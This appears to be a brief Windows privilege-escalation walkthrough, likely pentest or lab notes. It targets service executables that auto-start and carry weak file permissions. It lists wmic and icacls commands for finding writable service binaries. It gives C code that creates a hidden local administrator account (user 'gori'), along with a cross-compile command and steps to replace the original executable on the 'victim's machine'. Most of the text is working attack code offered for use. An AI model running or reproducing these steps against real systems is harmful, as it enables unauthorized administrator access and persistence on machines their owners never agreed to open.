whoami /priv to see if SeShutDownPrivilege is showing "Disabled" and then move to the next step
Find all services with "auto" start mode (automatically starts at system start-up),
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
If you see output, we should always check the permissions with icacls command.
icacls "file_path"
We are looking for (F)(W) permissions- full access
you might have to try other paths if there's any.
Once you see the file/executable has the incorrect permission, we can create a script that creates an administrator account.
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user gori goripass /add");
i = system ("net localgroup administrators gori /add");
return 0;
}
This script will add an account (user:gori pass:goripass) and will be added to the local administrator group.
Cross-compile the script in the local kali machine.
i686-w64-mingw32-gcc adduser.c -o adduser.exe
Transfer the file to the victim's machine.
Now, we need to rename the original executable file name to something else so that we can replace it with our evil executable.